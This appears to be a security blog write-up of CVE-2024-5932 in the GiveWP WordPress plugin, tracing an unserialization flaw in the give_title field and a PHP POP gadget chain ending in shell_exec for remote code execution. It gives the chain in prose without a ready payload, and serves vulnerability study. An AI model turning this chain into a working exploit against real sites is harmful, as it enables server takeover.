CVE-2024-5932

date

Aug 21, 2024

slug

PHP deserialization - POP chain

status

Published

PHP POP Chain for Remote Code Execution in GiveWP Plugin

Vulnerable Code Overview

Donation Form Processing:

The give_process_donation_form() function handles and processes donation form submissions.

Validation occurs through the give_donation_form_validate_fields() function.

Serialized fields are checked by give_donation_form_has_serialized_fields().

User Title Assignment:

The give_get_donation_form_user() function assigns the user_title using the give_title POST parameter.

Donation Data Preparation:

The give_process_donation_form() function prepares $donation_data and sends it to the payment gateway via give_send_to_gateway().

Donor Metadata Insertion:

The insert() method in the DonorRepository class inserts donor metadata, including the prefix which is derived from the user_title parameter.

Unserialization and Vulnerability Triggering:

The _give_donor_title_prefix meta is unserialized in the setup_user_info() function.

Exploitation Steps

instance of : Stripe\StripeObject -> __toString (magic method) -> toArray ->$_values['foo'] instance of Give\PaymentsGateways\DataTransferObjects\GiveInsertPaymentData -> toarry -> getLegacyBillingAddress -> $userInfo['address'] intance of Give -> adress property -> __get magic -> $container instance of \Give\vendors\Faker\validGenerator -> get -> __call -> $validator property is 'shell_exec' string -> invoke function with call_user_function($this->validator, $res)

The $userInfo['address'] in the GiveInsertPaymentData class instance can be set to an instance of the Give class. In the Give class, the $container property can be set, and when the __get() magic method is called, for example when the address1 property is queried, it invokes the get() method of the container.

Instance of Stripe\StripeObject:

The POP chain begins with an instance of the Stripe\StripeObject class. The __toString magic method is called, which invokes the toArray() method. Instance of Give\PaymentGateways\DataTransferObjects\GiveInsertPaymentData:

The toArray() method processes the $_values['foo'], which is an instance of GiveInsertPaymentData. This instance contains the method getLegacyBillingAddress. Instance of Give:

The getLegacyBillingAddress method accesses $userInfo['address'], which is an instance of the Give class. When the address1 property is accessed, the __get magic method of Give is invoked. Instance of Give\Vendors\Faker\ValidGenerator:

The __get method accesses the $container, which is an instance of ValidGenerator. When the get method is called on ValidGenerator, the __call magic method is invoked. Execution of shell_exec:

The $validator property of ValidGenerator is set to shell_exec. The __call method uses call_user_func($this->validator, $res), executing the shell_exec() function with the payload provided.